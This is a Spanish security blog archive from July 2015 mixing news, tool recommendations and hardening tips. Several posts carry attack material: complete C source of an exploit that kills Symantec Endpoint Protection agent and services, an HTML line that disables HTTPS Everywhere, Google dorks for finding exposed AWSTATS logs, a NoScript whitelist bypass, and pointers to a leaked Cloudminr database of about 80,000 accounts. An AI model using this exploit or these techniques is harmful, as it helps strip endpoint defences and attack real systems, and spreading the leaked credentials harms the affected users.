Este blog ya no está activo, sigue informándote aquí:

viernes, 31 de julio de 2015

Seguridad Libre.- El Mename sobre Seguridad Informática.

Ayer me llego la noticia de que existía un "meneame" dedicado al mundo de la seguridad informática. Así que, no tardé ni 5 minutos en hacer la búsqueda y empezar a publicar en seguridad libre


SeguridadLibre ya ha abierto sus puertas, así que si queréis estar día de las noticias relacionadas con este mundo os recomiendo encarecida esta págin.

Enlace:
Sed Buenos ;) 

jueves, 30 de julio de 2015

Nmap2Nessus.- Nessus + Nmap + Python = Amor xD

Algunas veces realizando un pentest de caja negra se hace un poco engorroso tener que alimentar Nessus con los datos descubiertos por Nmap y siempre he pensado en hacer me un script que los uniera a los dos. Seria muy fácil ya que el amigo [Adastra] habla y detalla muy bien en sus libro como implementar Nmap y Nessus con Python. 


Hoy el Dino, otro gran amigo de este blog, ha compartido por twitter un script en python que convina nmap y nesus listo para configurarlo y ejecutarlo. 

El Script se llama nmap2nessus y ha sido realizado por [Keith Lee]. Es bastante fácil de usar, aquí teneis el usage: 

  • nmap2ness.py [-h] [-s HOSTIP] [-n SCANID] [-u USERNAME] [-p PASSWORD] [-i INFILE] [-o OUTFILE]
Opciones de los argumentos:
  • -h, --help show this help message and exit 
  •  -s HOSTIP [nessus server IP] 
  •  -u USERNAME [username] 
  •  -p PASSWORD [password] 
  •  -t TEMPLATEFILE [Nessus template name to use] 
  •  -i INFILE [nmap xml file] 
  •  -n SCANID [lookup job based on scan_id (optional)] 
  • -o OUTFILE [nessus report (csv) (optional)] 

Espero que os guste, para descargar el script y más información os dejo el enlace de su GitHub: 

Sed Buenos con esto 0;) 

miércoles, 29 de julio de 2015

Desactivando El HTTPS Everywhere Con Una Linea En HTML

Si hace mas o menos un año os recomendaba encarecidamente el uso de HTTPS Everywkere, hoy os voy a contar como desactivarlo con una simple linea en html. 


El fallo encontrado por [Mathias Karlsson] estaba revisando el código de HTTPS Everywhere pero no encontró nada. Así que después de un tiempo, jugando con otras cosas, descubrió que con solo acceder a la extensión utilizando el "chrome-extension" ( Un gestor de URI) La extensión se desactivaba sola. 

De esta manera ni corto y perezoso investigó como podía reproducir y automatizar este error. Así q fue, después de algunos intentos fallidos,  como descubrió que cada vez que una pagina html se compilaba el podía meter una linea en HTML para hacer que la extensión cayera. 

Aquí tenéis dicha linea de código: 

  • <a ping = "chrome-extension://gcbommkclmclpchllfjekcdonpmejbdp/" id = "link" ></a><script> link . click () </script>

Fuente: 

La verdad es que ha sorprendido lo bien que estaba explicado el articulo. Así que os lo recomiendo muchísimo y no hagáis cosas malas con esto xD

Sed Buenos con esto 0;) 

martes, 28 de julio de 2015

Infografias.- ¿Que Herramientas He De Conocer?

Por experiencia propia a veces al inscribirme en algún curso o al impartir formaciones, me he encontrado con que hay gente que no sabe por donde empezar o que herramientas les van a ir mejores en el día a día de su nuevo trabajo en el mundo de la seguridad informática. Así que, al ver hoy en twitter la siguiente infografia me he alegrado ya que ahora puedo dar una respuesta contundente cuando me lo pegunte. 


Sed Buenos y ya sabes que estudiar este verano. xD 

lunes, 27 de julio de 2015

Atacando y Defendiendo la BIOS en 2015

Hace tiempo os recomendé un paper genial donde explicaba diferentes maneras de hacer sangre de un tipo de BIOS especifica. Ese paper era bastante antiguo y muy especifico como para generalizarlo o sacarle mucho provecho a la lectura.


Así que, hoy quiero recomendaros el paper llamado Attacking and Defending BIOS in 2015 realizado por: Oleksandr Bazhaniuk, Yuriy Bulygin, Andrew Furtak, Mikhail Gorobets, John Loucaides, Alex Matrosov y Mickey Shkatov.  La verdad es que si queréis meteros en este mundo del hackeo de bios, este es un gran paper para empezar. 

Enlace al documento: 

Sed Buenos con esto ;) 

viernes, 24 de julio de 2015

El Hackeo Del Jeep.

Hace unos días me sorprendió leer la noticia de que Charlie Miller (del que ya hemos hablado algunas veces por aquí) y Chris Valasek habían conseguido crear un exploit para controlar remotamente un Jeep en movimiento.

En este blog ya hemos hablado de que los coches eran el nuevo objetivo de los hackers junto a las aviones y de que ya se había hecho sangre de otros sistemas de seguridad en automóviles. Así que tampoco me parece tan extraño que se haya llegado a este nivel. 

Os dejo su vídeo pera que podáis ver como lo hicieron: 


La marcha del coche es un Jeep Cherokee y la solución de esta vulnerabilidad pasa por descargase el parche desde la web y pinchar el parche al automóvil a través de una memoria USB.

Parche:
Fuente: 

jueves, 23 de julio de 2015

Video.- "0-day"

Hoy creo haber batido dos records, el primero por ser el blog 300 mil en recomendar/anunciar este documental  y el otro por tener el titulo mas corto del día. Aunque de haber tenido este documental cuando impartía la formación  lo hubiera puesto sin pensármelo dos veces.

El documental, producido por VPRO el organismo de radio difusión holandesa, narra en 45 minutos como se comporta el mundo del hacking y el comercio de los 0-days. Así que, como no, os lo recomiendo encarecidamente,


Fuente:

Sed Buenos ;)

miércoles, 22 de julio de 2015

Ubuntu Automatic Security Updates (Fe de Erratas)

Hace un par de días os presente un sencillo script en bash para no tener que lidiar con apt-get update & upgrade y la verdad es que no es la única manera de poder aplicar actualizaciones de seguridad, ni la mejor ya que al descargarse y aplicarse todas estas actualizaciones (que pueden ser o no de seguridad) pueden haber problemas.


Así que hoy quiero enmendar mi error e indicaros las 4 maneras que expone ubuntu para las actualizaciones automáticas de seguridad en [su pagina de ayuda]. La verdad es que están un poco desfasadas por que con Ubuntu 14.0.4 me constó encontrar la opción 1 xD)

Opciones:

  1. Usar el GNOME Update Manage, que no deja de ser el actualizador por defecto de Ubuntu 14.0.4 y que por defecto esta muy bien configurado. 
  2. Usar el paquete unattended-upgrades: Si propósito es mantenernos al día con las ultimas actualizaciones de seguridad que le configuremos 
  3. Escribiendo nuestro propio cron script llamando a aptitude/apt-*. Esto es lo que os presenté el otro día solo hace falta explicar que cron es el daemon que controla los procesos que se ejecutan automáticamente en un tiempo determinado.
  4. Usando cron-apt, podremos controlar las actualizaciones a través de cron. Por defecto no insta dichas actualizaciones así que habrá que configurarlo previamente. 
Como veis, el script del otro día entra dentro de las opciones de ubuntu pero, no estaría mal tener una copia de seguridad por si acaso.Ya entraremos otro día en ello si os interesa. 

Espero haber enmendado mi error y que así, al igual que yo,  hayáis aprendido un poco mas como funciona el sistema de actualizaciones de Ubuntu.

Sed Buenos ;) 

martes, 21 de julio de 2015

Google Chrome y Nuestros Micrófonos

Esta mañana a leer la lista de la Rooted CON me he dado cuenta de que Google Chrome en su nueva actualización ha incorporado el "Ok Google" vamos,  la opción de poder buscar cosas en google mediante voz que ya tan sobada tenemos de sistemas como Android.


Así que ahora la empresa de este buscador puede apoderarse de nuestro micrófono bueno, eso si no l desactivamos. Normalmente debería venir la opción desactivada por defecto pero por si se ha activado misteriosamente,  aquí tenéis esta mini-guía.

  1. Abre el Google Chrome
  2. Escribe en la barra de navegación lo siguiente:
    1. chrome://voicesearch/
  3. Si no ves nada perfecto, no tienes la "aplicación" instalada. Pero si ves información, ves al menú de Google chrome (las rallas de arriba a la derecha) y ve a configuración.
  4. Busca lo siguiente Enable "Ok Google" to start a voice search y desactiva la opcion en caso de que esté activa. 
Fácil y rápido. Si queremos comprobarlo vamos al buscador de Google y clicamos encima del micrófono y nos aparecerá la opción de habilitarlo. 


Sed Buenos ;) 

lunes, 20 de julio de 2015

Metasploit.- Cheat Sheet

Ahora que muchos estáis de vacaciones o estáis apunto de pillarlas es hora de darle caña a todo lo aprendido durante el "curso", montarnos un metasploitable y darle fuerte y duro hasta que aprendamos a usar metasploit de forma rutinaria (bueno, al menos esto quiero hacer yo este verano xD). Para esto y para que yo me acuerde en un futuro voy a recomendaros el Cheat Sheet de metasploit hecho por SANS Institute. 


Espero que le deis muy fuerte a mestasploit. 

Sed Buenos ;) 

domingo, 19 de julio de 2015

Script.- Actualizar Ubuntu Al Inicar Sesión.

Los que me seguís en el twitter o la gente a la que la he pedido consejo ya sabrá que desde hace unos días estoy jugando con el sistema operativo Ubuntu para aprender un poco mas.  Para los que no estéis en el Grupo del blog podréis [encontrar una guía para el Hardening de Ubuntu] si os unís.


Sinceramente después de instalas las actualizaciones me hacían falta para que Ubuntu funcionara correctamente, que he de decir que ha ido mas rapido que Windows 10, y de algún que otro problema al leer dvds originales con vlc. Pensé en que seria muy facil hacer un script en Bash para que cada día se actualizasen las aplicaciones y no tener que estar pendiente del apt-get update y upgrade cuando saliera una vulnerabilidad importante. Así cada día se instalará las actualizaciones correspondientes. 

Aquí teneis el script: 

#!/bin/bash

# Actualizar el listado de paquetes disponibles
 
sudo apt-get update -y && echo ""

#Actualizar todos los paquetes del sistema, instalando o desinstalando los paquetes que sean necesarios para resolver las dependencias que pueda generar la actualización de algún paquete

sudo apt-get dist-upgrade && echo ""

#Actualizar solo los paquetes ya instalados que no necesitan, como dependencia, la instalación o desinstalación de otros paquetes

sudo apt-get upgrade -y && echo ""


#Para mantener el sistema limpio de bibliotecas inútiles

sudo apt-get autoremove -y && echo ""

#Para limpiar los paquetes viejos que ya no se usan

sudo apt-get autoclean -y && echo ""


Copia y pégalo en un nuevo documento y guárdalo como .sh. Para provarlo solo hace falta ejecutar el siguiente comando.
  • sh ruta/nombredelarchivo.sh 
Ahora que ya sabemos que funciona lo copiamos a la carpeta init.d
  • sudo mv /ruta/nombredelarchivo.sh  /etc/init.d/   
Cambiamos los permisos del script copiado.
  • sudo chmod +x /etc/init.d/nombredelarchivo.sh 
Y por último actualizamos el rc.d con la configuración por defecto.
  •   sudo update-rc.d nombredelarchivo.sh defaults
Bueno también he incluido el && echo"" para poder ver el proceso y si hay algún error, espero que os guste y que os sirva. A mi me ha encantado jugar esta tarde con esto ;)

Sed Buenos ;)

viernes, 17 de julio de 2015

Google Hacking de Logs de AWSTATS

Hace unos días haciendo experimentos con diferentes dork de Google me aparecieron diferentes logs indexados  con el nombre "AWSTATS DATA FILE 6.5 (build 1.857) # If you remove this ..." Así que, me vi en la obligación moral de investigar un poco mas sobre que era eso y que oportunidades le podría dar a un atacante si encontrara estos logs. 


Primeramente saber que, según Wikipedia, Awstats es una herramienta open source de informes de análisis web, apta para analizar datos de servicios de Internet como un servidor web, streaming, mail y FTP. Pero, por la falta de formación de algunos administradores estos logs quedan públicos y acaban siendo siendo indexados por Google. 

Estos logs contienen muchísima información pero para mi la mas "suculenta" es desde donde es vista las páginas y a que directorios del servidor van estas visitas. Por ejemplo si entramos en un log y vemos que entre los directorios mas visitados hay un wp-content sabremos que en ese servidor hay motado un wordpres y ya podríamos forzar mensajes de error para que el wordpress revelara su versión para luego atacarlo con herramientas especificas. 

Dorks de google para la bus queda de estos logs: 
  • intitle:"statistics of" "advanced web statistics"
  • intext:"AWSTATS DATA FILE" filetype:txt
  • inurl:/(cgi-bin|awstats)/awstats.pl?config=
  • intitle:"Statistics of" inurl:/(cgi-bin|awstats)/awstats.pl?config=
La verdad es que otorga información bastante jugosa para un atacante si se rebusca bien así que tener estos logs públicos pueden ocasionar un problema en la seguridad del servidor web. 
Fuente de los Dorks; 

Sed Buenos con esto 0;) 

jueves, 16 de julio de 2015

Exploit.- Deshabilitando Symantec EP 12.1.4013

Hace unos días me enviaron este exploit para que la analizara y la verdad es que me ha molado bastante.


Producida por John Page en diciembre del 2014 y reportada por symantec el día 20 de enero del 2015. Afecta la versión 12.1.4013 de Symantec Endpoint Protection y permite matar matar tanto al gente como a los servicios relacionados.

Por lo que, ahora "compliar" el exploit ejecutarlo y poder meter todo lo que queramos en esta máquina seria trivial si la victima no tiene un buen sistema de actualizaciones.

Aquí tenéis el exploit:  

#include <windows.h>
#include <Tlhelp32.h>
#define SMC_EXE "Smc.exe"
#define SMC_GUI "SmcGui.exe"
#define CC_SVC_HST "ccSvcHst.exe"

/*
By John Page (hyp3rlinx) - Dec 2014 - hyp3rlinx.altervista.org
Symantec Endpoint Protection version 12.1.4013
First reported to Symantec - Jan 20, 2015

Goal:
Kill Symantec EP agent & services after globally locking down endpoint protection via the
Symantec central management server and enabling globally managed password protection controls. Tested successfully on Windows 7 SP1 result may vary OS to OS.

Scenario:
Run the from browser upon download or save to some directory and run
Not the most elegant code and I don't care...

*/

void el_crookedio_crosso(const char *victimo){
HANDLE hSnapShot=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
PROCESSENTRY32 pEntry;
pEntry.dwSize=sizeof(pEntry);
BOOL hRes=Process32First(hSnapShot,&pEntry);

while(hRes){
if(strcmp(pEntry.szExeFile,victimo)==0){
HANDLE hProcess=OpenProcess(PROCESS_TERMINATE,0,(DWORD)pEntry.th32ProcessID);
if (hProcess!=NULL){
TerminateProcess(hProcess,9);
CloseHandle(hProcess);
}
}
hRes=Process32Next(hSnapShot,&pEntry);
}
CloseHandle(hSnapShot);
}

DWORD exeo_de_pid(char *ghostofsin){
DWORD ret=0;
PROCESSENTRY32 pe32={sizeof (PROCESSENTRY32)};
HANDLE hProcSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if (hProcSnap==INVALID_HANDLE_VALUE) return 0;
if (Process32First (hProcSnap,&pe32))
do
if (!strcmp(pe32.szExeFile,ghostofsin)) {
ret=pe32.th32ProcessID;
break;
}
while (Process32Next (hProcSnap,&pe32));
CloseHandle (hProcSnap);
return ret;
}

void angelo_maliciouso(){
int AV=exeo_de_pid(SMC_EXE);
char id[8];
sprintf(id, "%d ", AV);
printf("%s", id);
char cmd[50]="Taskkill /F /PID ";
strcat(cmd, id);
system(cmd);

// system("Taskkill /F /IM Smc.exe"); //Access denied.
system("\"C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\Smc.exe\" -disable -ntp");

Sleep(1000);

el_crookedio_crosso(SMC_EXE);
el_crookedio_crosso(SMC_GUI);
el_crookedio_crosso(CC_SVC_HST);

}

int main(void){

puts("/*-----------------------------------------------------------*/\n"
);
puts("| EXORCIST DE SYMANTEC Antivirus version 12.1.4013 |\n");
puts("| By hyp3rlinx - Jan 2015 |\n");
puts("/*------------------------------------------------------------*/\n
");

SetDebugPrivileges();
angelo_maliciouso();

Sleep(1000);

el_crookedio_crosso(SMC_EXE);
el_crookedio_crosso(SMC_GUI);
el_crookedio_crosso(CC_SVC_HST);

Sleep(2000);
angelo_maliciouso();

Sleep(6000);

return 0;
}

int SetDebugPrivileges(){
DWORD err=0;
TOKEN_PRIVILEGES Debug_Privileges;
if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&Debug_Privileges.Privileges
[0].Luid))return GetLastError();
HANDLE hToken=0;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken
)){
err=GetLastError();
if(hToken)CloseHandle(hToken);
return err;
}
Debug_Privileges.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
Debug_Privileges.PrivilegeCount=1;

if(!AdjustTokenPrivileges(hToken,FALSE,&Debug_Privileges,0,NULL,NULL)){
err=GetLastError();
if(hToken) CloseHandle(hToken);
}
return err;
}

Fuente: 

miércoles, 15 de julio de 2015

¡Tu Base de Datos Por Un Bitcoin!

Ayer Cloudminr.io un servicio de minado ve Bitcons fue hackeado y como el malo tenia el control de la página web nos se le ocurrió nada mas que desfasear la web y exponer alrededor de 1000 cuentas de usuarios la propia página web. Aun así, le ha dado tiempo a vender toda la base de datos de esta por un Bitcoin. 


La base de datos contenía la friolera de 80.000 usuarios junto a su correo electrónico y su contraseña. Aunque ya se ha filtrado y la podéis encontrar en el Grupo de google de este blog. 

Enlace: 

martes, 14 de julio de 2015

Infografia.- El Hacking Team En Numeros

Con la vorágine de datos que han habido últimamente es normal que yo, en este blog, me haya centrado mucho en la parte que me toca mas pero, me he dejado todo el tema de las cifras y la verdad es que son reseñables, suerte que la gente que usa Internet es benevolente y crea infografias donde se resume también todo este tema. 


La verdad es que es un buen resumen. 

Sed Buenos ;) 

lunes, 13 de julio de 2015

Mas 0'day Para Flash Player De Parte Del HackingTeam

El Hacking Team no para de darme trabajo y es que ayer por la noche lei que entre los documentos filtrados de esta gente se descubrieron dos nuevas vulnerabilidades para Adobe Flash Player los cuales se utilizaron para crear spyware del bueno.



Las vulnerabilidades son las siguientes:
  • CVE-2015-5122: Vulnerabilidad para después de la liberación no especificada por Adobe, la cual permite causar la caída de la aplicación y tomare el control del sistema. 
  • CVE-2015-5123: Vulnerabilidad para después de la liberación no especificada por Adobe, la cual permite causar la caída de la aplicación y tomare el control del sistema. 
Productos afectados:
  • Adobe Flash Player 18.0.0.203 y versiones anteriores para Windows y Macintosh 
  • Adobe Flash Player 18.0.0.204 y versiones anteriores para Linux installed con Google Chrome 
  • Adobe Flash Player Extended Support Release versión 13.0.0.302 y versions anteriores a la 13.x para Windows and Macintosh 
  • Adobe Flash Player Extended Support Release versión 11.2.202.481 y versions anteriores a la 11.x para Linux 
Más información:
Solución:

  • Adobe está preparando el parche correctivo para resolver la vulnerabilidad, estando prevista su publicación en los próximos días.
Como podéis ver la solución esta un poco lejos de llegar, así que desactivar el Flash Player por favor. ¡DESACTIVALOOO!

Si queréis saber como realizar la explotación de esta vulnerabilidad os recomiendo el siguiente artículo:
Sed Buenos  con esto 0;) 

domingo, 12 de julio de 2015

El Densha StateX.- Otra Idea Tonta xD

Hace mucho que tenia está idea en la guantera y aunque no se lo bien que saldrá, creo que es el momento de sacarla de la saca. 



Densha StateX es un grupo de Google groups donde podéis dar vuestra opinion de los temas que vaya poniendo yo en sea "lista" o podéis crear los vuestros propios temas para que discutamos entre todos y mejoremos nuestras ideas o dudas.

Para acceder a la lista es tan facil como darle clic a este enlace o ir a la pagina ¿Discutimos?:


Ademas últimamente veo que hay problemas con los comentarios y con esto solucionamos dos pajaros de un tiro y nos irá genial para compartir muchas mas información que la que puedo indicaros en un comentario. 

Sed Buenos y espero que la idea salga bien.  ;) 


Ofensive Security Presenta Kali Sana

Hace ya unos dias el equipo responsable de Ofensive Security lanzó un trailer de la nueva versión de su distribución para pentesting de todo tipos de equipos basada en linux.


Esta versión saldrá 11 de agosto de este año y pretende traernos bastantes novedades. La verdad es que se ve bastante chula y tengo ganas de empezar a jugar con ella. Así que ya me tengo que empezar ha hacer con un portatil decente pera este verano.

Os dejo con el trailes y espero que os motive tanto como a mi.


Sed Buenos ;)

viernes, 10 de julio de 2015

Encuesta.- Entrada 1000, StateX y Patreon

Ayer escribí la entrada 1000 de este blog y parece mentira que ya hayamos llegados a esta cifra después de 2 años y medio (puede que un poco mas) de blog. La verdad es que he hecho muchos experimentos con él, el último ha sido la inclusión de publicidad la cual me ha desaparecido porque no me podía estar quieto y tenia que tocarlo. He durado 2 meses xD

De esta manera y conociendo las estadísticas de visitas y sabiendo que entre vosotros hay lectores que seguís el blog desde hace tiempo, me gustaría haceros una pregunta. ¿Si montara un Patreon me apoyaríais?

Para que los que no conozcáis Patreon solo deciros que es una web donde tu puedes presentar tu proyecto y tus seguidores si lo creen oportuno pueden apoyarte a través de micro-transacciones.  Os dejo el vídeo y el enlace a la web que seguro que os lo explicaran mucho mejor que yo. 


Enlace:

Ahora ya que conocemos lo que es patreon me gustaría volver ha hacerlos la misma pregunta ¿Me ayudarías a seguir adelante con el blog a través de esta plataforma?



¡Muchas gracias por contestar!

Me encantaría invertir mas tiempo en este blog pero como me dijo un directivo, si dedicaras ha hacer todas las entradas bien se convertirá en otro trabajo y la verdad es que con patreon y con patrones puedo conseguirlo.

Sed Buenos y espero que contestéis a la encuesta.  

jueves, 9 de julio de 2015

Guia para securizar tu Windows 8 ¡It's Free!

Hace unos días que no paramos de ver vulnerabilidades y formas de que la gente "mala" se haga con el control de nuestros equipos. Así que, no viene mal aprender a hacer hardening (o ha asegurar) de nuestros equipos y si puede ser con una guía técnica buena y gratis mejor. De esta manera os recomiendo esta guía que la verdad vale mucho la pena. 


Enlace a la guía: 

Lamento si hoy la entrada es un poco corta pero ya me gustaría a mi poder recomendaros guías de cada uno de los sistemas operativos de Microsoft pero hoy no tengo mas tiempo así que me lo apunto para cualquier otro día. 

Fuente: 
Sed Buenos ;) 


miércoles, 8 de julio de 2015

La 0'day De Flash del HackedTeam y Los Exploit Kits

Ayer os hablé de los 400GB que fueron expuesto de la empresa HackingTeam entre los que habian documentos de ciertos cuerpos de "seguridad" del estado pero, aun hay información que quiere salir a la luz como por ejemplo un 0day para Flash Player el cual, ya han sido puestos a disposición para diferentes exploitsKits. 


La vulnerabilidad:
  • CVE-2015-5119: Vulnerabilidad después de la liberación en la clase ByteArray permite al atacante provocar la caída del sistema o tomar el control del sistema afectado. 
Software afectado:
  • Adobe Flash Player 18.0.0.194 y versiones anteriores para Windows and Macintosh 
  • Adobe Flash Player Extended Support Release versión 13.0.0.296 y versiones anteriores a la 13.x para Windows and Macintosh 
  • Adobe Flash Player 11.2.202.468 y versiones anteriores a la 11.x para Linux 
Más información:
Solución:

  • Adobe espera publicar un nuevo parche para hoy día (08/07/2015) pero a fecha del envio de este correo aun no se ha publicad. Tan pronto sea publicado os lo haremos llegar.
  • Deshabilitar Adobe Flash Player.
Como ya os he comentado esta vulnerabilidad ya ha sido confirmada en tres Exploits Kits diferentes: 
Junto a que esta en estos Exploits Kits y a que adobe aun a la hora en que he realizado esta entrada no ha publicado parche alguno, hace que esta vulnerabilidad sea critica. Aunque también está al abasto de todo el mundo que sepa usar Metasploit para que podamos investigar con una vulnerabilidad tan "famosa" como esta. 

Exploit 0day Flash del Hacking Team: 
Varios sistemas de detección de malware ya han publicado actualizaciones para sus herramientas que ayudan a detectar y bloquear esta amenaza. Así que ya sabéis, haced una búsqueda rápida y decidid el que mas os convenga y deshabitad el Flash player por el amor de diox. 

Fuente:
Sed Buenso con esto 0;)   

martes, 7 de julio de 2015

El Hackeo Al Hacking Team y Los Documentos Españoles.

Hace un parte días que la blogosfera de blog de seguridad no para de darse eco de esta noticia. La verdad que la publicación de 400 GB de información de una empresa que vendía Spyware a gobiernos es una noticia a comentar. Pero eh, que esto a los españoles no nos toca de refilón sino que encima nuestro querido CNI está en la lista de clientes en pleno apogeo de la ley mordaza en nuestro país. 


Como siempre, hay gente que antes de leerse la misma noticia una y otra vez con distintas opiniones prefieren aportar un poco a la comunidad. Gracias a estas personas tenemos un resumen de las cuentas usadas en España y latino América en una web o incluso los mails de los clientes con algunas cuentas bastante curiosas. (rebuscad que hay sorpresa) 
Aunque España no somos tan malos como parecemos ya que eso de pagar los servicios prestados por la creación de software no se nos da del todo bien y nos retrasamos con el pago xD

Aquí tenéis el enlace al correo donde hablan de ello: 

En serio os recomiendo que rebusquéis en toda esta información ya que os llevareis mas de una persona. 

Sed Buenos con esto 0;) 

lunes, 6 de julio de 2015

Firefox y Su ¡No Toco SSLv3 y RC4 Ni Con Un Palo!



Hace un par de días que Mozilla Firefox que, aparte de solucionar algunas vulnerabilidades criticas como las siguientes: 
  • CVE-2015-2731: Las vulnerabilidades críticas residen en un uso después de liberar memoria cuando Content Policy modifica el Document Object Model para eliminar un objeto DOM 
  • CVE-2015-2722: Uso de memoria después de liberarla en workers mientras se usa XMLHttpRequest. 
  • CVE-2015-2733: Uso de memoria después de liberarla en workers mientras se usa XMLHttpRequest. 
  • CVE-2015-2724: Diversos problemas de corrupción de memoria en el motor del navegador
  • CVE-2015-2726: Diversos problemas de corrupción de memoria en el motor del navegador 
  • CVE-2015-2734: Múltiples vulnerabilidades encontradas a través de inspección de código
  • CVE-2015-2740: Múltiples vulnerabilidades encontradas a través de inspección de código
Sino que le ha dado una patada de esas que utilizamos todos para esconder la suciedad debajo de las alformbras, al protocolo SSLv3 y a RC4,  La verdad es que ya era hora de que alguno de los navegadores mas importante del "mercado" se posicionara después de que el IETF dese a este protocolo como muerto. 

Algunos sabréis lo fan que soy de Google Chrome pero creo que, si no encuentro mas noticias al respecto, cambiaré de navegardor. Volveré a esa época donde usar plugins era molón. 

Sed Buenos y actualizad vuestro Firefox. 

domingo, 5 de julio de 2015

Un Pequeña Guía Sobre La Explotación de ARM

Así se titula y de eso trata el PDF que voy a recomendaros. La verdad es que la explotación de arquitecturas es algo en lo que me da mucho miedo meterme ya que en mi opinión, pienso que es bastante difícil o al menos a mi me cuesta bastante pillarlo. Pero la verdad es que este paper hace que entenderlo parezca fácil. 

Indice: 
  1. Introduction:
    1. Introduction to ARM Processors
    2. ARM Trustzone
    3. ARM vs x86
  2. Architecture:
    1. Modes of Operation
    2. Registers
    3. Types of registers and their roles
    4. ARM Status Registers
    5. Functional Diagram of ARM 
  3. ARM assembly language:
    1. Data Processing Instructions
    2. Arithmetic Instructions
    3. Logical instructions
    4. Comparison Instructions 
    5. Memory Access Instructions 
    6. Conditional Execution
    7. Branch Instructions 
  4. ARM Exploitation:
    1. Setting up the lab
    2. Format string Vulnerability 
    3. Buffer overflows d. Ret to Libc
    4. Problems in Ret2Libc on ARM f. Ret2ZP and finding new vectors
    5. ROP (Return Oriented Programming)
  5. Conclusion and Bibliography
Enlace al paper: 
Sed Buenos con esto 0;) 

Invisible Inc.- El Juego Que Has De Hackear Para Completarlo.

Ya sabéis los que me seguís desde hace tiempo lo que me gustan los videojuegos. Así que no me he podido resistir a saber mas sobre este juego después de ver el titular de la noticia. 

Sin entrar mucho de las bondades del juego, Invisible Inc es un juego de sigilo y espionaje donde los fans del juego se dieron cuenta de que había un logro (premio/reconocimiento que te dan por cumplir algunos objetivos) no había forma de sacarlo. 


Así y llevados por su afán completista indagaron un poco a ver como podían sacar su preciado logro y lo consiguieron. 

Como hackear el juego para completarlo: 
  1. Vamos a la carpeta “Steam/SteamApps/Common/InvisibleInc” que contiene el archivo “state-main-menu.lua” 
  2. Lo abrimos con el bloc de notas y buscamos la siguiente línea:
    1. if not config.DEV and KLEIAchievements then
    2. --KLEIAchievements:achieve( "META_HACKING" )
    3. end
  3. Borramos los "--" delante de la linea  "--KLEIAchievements:achieve( "META_HACKING" )"  
  4. Ahora y para que el sistema anti trucos de steam no nos salte en la cara, eliminaremos el archivo hashes.dat de misma carpeta y crearemos uno nuevo en blanco. 
Lo curioso es que si nos en esa linea de código podemos llegar a intuir que fue desarrollado con la intención de que los usuarios mas quisquillosos tuvieran que Hackear el juego para poder completarlo. Ademas en la ultima actualización los mismos desabolladores indicaron que lo hicieron aposta. 

Fuente: 
Sed Buenos y si sois desarrolladores por favor haced mas cosas como estas. ;) 

viernes, 3 de julio de 2015

Como Bypassear NoScript De Forma Fácil.

Este Bypass lo encontré en el blog Hackplayers (link en la funete) y me gustó mucho debido a que es en lo ultimo que piensas a la hora de trastear algo.  La verdad es que si no tienes ganas de trastear mucho y tienes algo de dinero, esta es una solución muy sencilla. 


Para los que no conozcáis NoScript, solo deciros que es un plugin de Mozilla que es capaz de bloquear la ejecución de código JavaScript, Java y Flash de la página web que visitemos. Es un plugin importante y muy utilizado, El navegador para el anonimato TOR lo implementa por defecto. 

El Bypass:

NoScript tiene una lista blanca la cual se encarga de alojar sitios de confianza donde si que se podrá ejecutar código. Esta lista se configura por defecto al instalar el plugin, así que a Matthew Bryant, el que descubrió esta vulnerabilidad, se dio cuenta de que si descubría un sitio web de esa lista que no estuviera activo, el podría comprar el dominio y poner una pagina maliciosa por debajo de este. 

Matthew rebuscó en la lista por defecto y encontró que el dominio que el dominio “zendcdn.net” no existía, asi que lo compró por $10.69 y montó una Prueba de Concepto por debajo. Aquí teneis una foto de la PoC.


Lo dicho,  ahora también es aconsejable darle un vistazo a las listas blancas por defecto a ver si podemos llevarnos una sorpresa.

Fuente:


Sed Buenos con esto 0;)

jueves, 2 de julio de 2015

Fotos En Una Mina China De Bitcoins

Siempre hemos visto las típicas fotos de minas chinas de Bitcon, la famosa moneda virtual,  ardiendo o en sitios que realmente no son aptos como almacenar una mina.  Pero, si el Bitcoin es tan difícil de minear es por que alguien le está dando duro y alguien debe estar haciendo las cosas bien.

La verdad es que las fotos que vais a ver a continuación están sacadas de un articulo sobre la vida en una mina de esta moneda (lo podréis ver en la fuente) y cariño, si estás leyendo esto, ¿Podemos tener esto en el salón de casa?

La mina:






El día a día:



Un parón nunca hace daño:



Los empleados:



 La verdad es que esto tiene otra pinta. Hasta yo invertiría en una mina así.

 Fuente:

Sed Buenos ;)  

miércoles, 1 de julio de 2015

Señores SSLv3 Ha Muerto

Hoy estoy de enhorabuena, no solo puedo centrarme en este tipo de entradas as libres y con mucha mas personalidad sino que por fin el [IETF siglas de Internet Enginnering Task Force] (Organismo que produce documentos técnicos pertinentes que influyen en el diseño de manera que la gente, usa y gestiona Internet)  ha declarado al protocolo SSL 3.0 Muerto, aunque ya era hora porque 20 años de protocolo han dado para mucho. 



Este protocolo nos ha dado muchos dolores de cabeza a los que nos dedicamos a la gestión de vulnerabilidades desde POODLE. Hasta yo he pensado en tener un postit anunciando los días sin una vulnerabilidad en SSLv3. Así que me alegro mucho de que en el RFC 7568 lo proclamen como obsoleto.


"The Secure Sockets Layer version 3.0 (SSLv3), as specified in RFC 6101, is not sufficiently secure. This document requires that SSLv3 not be used. "
"The replacement versions, in particular, Transport Layer Security (TLS) 1.2 (RFC 5246), are considerably more secure and capable protocols."
Bueno, ahora solo tenemos faena para gestionar el cambio a TLS y a que salgan nuevas vulnerabilidades para esta nueva versión del protocolo.

Fuente:

Sed Buenos y sacad el cava antes de que sea tarde ;)